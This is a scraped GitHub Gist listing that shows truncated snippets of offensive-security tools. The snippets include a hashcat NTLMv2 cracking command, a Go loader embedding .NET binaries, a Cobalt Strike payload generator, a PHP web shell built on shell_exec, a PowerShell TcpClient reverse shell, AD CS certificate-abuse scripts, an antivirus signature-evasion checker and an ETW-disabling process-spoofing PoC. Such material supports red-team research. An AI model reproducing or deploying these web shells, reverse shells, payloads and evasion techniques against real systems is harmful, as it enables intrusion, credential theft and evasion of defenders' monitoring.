Michael Eder edermi
ericbaranowski
/ hashcat.txt
Last active
April 6, 2018 08:44
Azure GPU password cracking using Hashcat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo ./hashcat64.bin -a 0 -m 5600 ntlmv2.hash rockyou.txt --workload-profile 4 --generate-rules 10000 --cpu-affinity --powertune-enable | |
| hashcat (v4.0.1) starting... | |
| OpenCL Platform #1: NVIDIA Corporation | |
| ====================================== | |
| * Device #1: Tesla M60, 2030/8123 MB allocatable, 16MCU | |
| * Device #2: Tesla M60, 2030/8123 MB allocatable, 16MCU | |
| Hashes: 1 digests; 1 unique digests, 1 unique salts | |
| Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates |
ropnop
/ go-sharp-loader.go
Created
August 5, 2020 17:12
Example Go file embedding multiple .NET executables
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| Example Go program with multiple .NET Binaries embedded | |
| This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
| $ go get -u github.com/gobuffalo/packr/packr | |
| Place all your EXEs are in a "binaries" folder |
gitjdm
/ GenPayload.cna
Created
October 4, 2020 18:04
Cobalt Strike raw payload generation dialog that allows the exit function to be specified
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| popup attacks_other { | |
| item("Payload (Choose Exit Function)", { GenPayloadDialog(); }); | |
| } | |
| sub GenPayloadDialog { | |
| $dialog = dialog("Payload", %(listener => "", arch => "", exitfunc => ""), &GenPayload); | |
| drow_listener_stage($dialog, "listener", "Listener: "); | |
| drow_combobox($dialog, "exitfunc", "Exit Function: ", @("thread", "process")); | |
| drow_combobox($dialog, "arch", "Arch: ", @("x64", "x86")); | |
| dbutton_action($dialog, "Generate"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Mozilla User Preferences | |
| // To change a preference value, you can either: | |
| // - modify it via the UI (e.g. via about:config in the browser); or | |
| // - set it within a user.js file in your profile (create it if it doesn't exist). | |
| // | |
| // Profile folder location on different systems: | |
| // Windows: C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxxxxx.default | |
| // Mac OS X: Users/<username>/Library/Application Support/Firefox/Profiles/xxxxxxxx.default | |
| // Linux: /home/<username>/.mozilla/firefox/xxxxxxxx.default |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| function escapetext($text) { | |
| return str_replace("\n", "<br>", htmlentities($text)); | |
| } | |
| function exec_command($cmd, $internal = false) { | |
| try { | |
| $shell_exec = shell_exec($cmd); | |
| } catch (Exception $e) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################## | |
| ## PyDefenderCheck - Python implementation of DefenderCheck | |
| ################################################## | |
| ## Author: daddycocoaman | |
| ## Based on: https://github.com/matterpreter/DefenderCheck | |
| ################################################## | |
| import argparse | |
| import enum |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do | |
| { | |
| $writer.Flush(); | |
| $read = $null; |
leechristensen
/ CES.py
Last active
December 13, 2023 01:39
Crude example of how to build a CSR and issue an HTTP request a certificate via AD CS's Certificate Enrollment Web Service's SOAP endpoint
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from cryptography.hazmat.backends import default_backend | |
| from cryptography.hazmat.primitives import serialization | |
| from cryptography.hazmat.primitives.asymmetric import rsa | |
| from cryptography import x509 | |
| from cryptography.x509.extensions import ExtensionType | |
| from cryptography.x509.oid import NameOID | |
| from cryptography.hazmat.primitives import hashes | |
| from cryptography.x509.general_name import GeneralName, IPAddress, OtherName | |
| import base64 | |
| import pyasn1 |
dmchell
/ SharpApprover.cs
Created
September 21, 2021 13:49
Reset the mspki-enrollment-flag attribute when you possess a write ACE on a vulnerable certificate template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.DirectoryServices; | |
| namespace SharpApprover | |
| { | |
| class Program | |
| { | |
| public static void SetAdInfo(string objectFilter, | |
| int objectValue, string LdapDomain) |
xpn
/ env_var_spoofing_poc.cpp
Created
June 6, 2020 21:25
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on | |
| // setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET. | |
| // | |
| // Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables, | |
| // and then resuming the process. | |
| // | |
| // (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/) | |
| #define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0" | |
| #define INJECT_PARAM_LEN 43 |
OlderNewer